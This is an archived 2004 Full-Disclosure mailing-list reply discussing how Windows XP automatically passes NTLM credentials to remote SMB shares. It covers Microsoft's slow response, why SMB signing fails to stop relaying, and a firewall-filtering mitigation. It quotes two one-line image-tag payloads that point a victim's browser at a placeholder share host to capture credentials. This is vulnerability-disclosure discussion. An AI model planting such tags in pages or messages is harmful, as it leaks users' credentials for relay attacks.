Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re[2]: [Full-Disclosure] Automatically passing NTLM authentication crede

from [3APA3A] Network Security [Permanent Link]
Subject: Re[2]: [Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP
Date: Wed, 29 Sep 2004 10:52:42 +0400 
Dear Hidenobu Seki,

HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all

I  have  same  question.  I  had discussion on this topic with Microsoft
security  team  again  just few weeks ago (and 2 more discussions during
last  4  years).  They accepted this problem and have re-opened the case
(MSRC  5468lw)  but  gave  no timelines for solution. I think MS doesn't
understand  problem  completely.  For  example,  they  still believe SMB
signing prevents NTLM relaying attacks while SMB signing doesn't prevent
even  simplest  port  redirection,  because  IP  address  is not signed.

Currently  there  is  no  way  to mitigate this problem except filtering
outgoing  NetBIOS  and  CIFS  requests  by  implementing  domain wide IP
Security  policy  to  allow  SMB  and  CIFS communication only with file
servers/domain  controllers  (if  somebody  is  interested I can publish
step-by-step instructions, but I believe MS should publish KB article to
describe this configuration).

I  don't  think  problem  reported  by you is different issue, it's just
another exploit scenario for the same problem. I know few more tricks to
redirect user to UNC share.

--Wednesday, September 29, 2004, 5:43:15 AM, you wrote to 
3APA3A@SECURITY.NNOV.RU:


From: 3APA3A <3APA3A@SECURITY.NNOV.RU>

This  problem  is  known  since at least 1997 and still can be exploited
with   <IMG  SRC="\\w.x.y.z\fakeshare\fakefile">  without  any  MS  Word
document.


HS> It is not true.
HS> They are different problems that happen the same phenomenon.

HS> Mr. Cesar Cerrudo taught me that <img
HS> src=file://\\www.xxx.yyy\test> still 
HS> works.

HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and 
HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all

HS> Kind regards,
HS> Urity

HS> _________________________________________________________________
HS> STOP MORE SPAM with the new MSN 8 and get 2 months FREE* 
HS> http://join.msn.com/?page=features/junkmail



-- 
~/ZARAZA
Появился новый тип элементарных частиц - шкварки.
Не очень большие, слегка подгоревшие.  (Лем)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: New whitepaper "The Phishing Guide", Chip Andrews
Next by Date:  Multiple XSS Vulnerabilities in Wordpress 1.2, Thomas Waldegger
Previous by Thread:  Vignette Application Portal Unauthenticated Diagnostics, Advisories
Next by Thread:  Re[2]: [Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP, Hidenobu Seki
Indexes:  [Date] [Thread] [Top] [All Lists]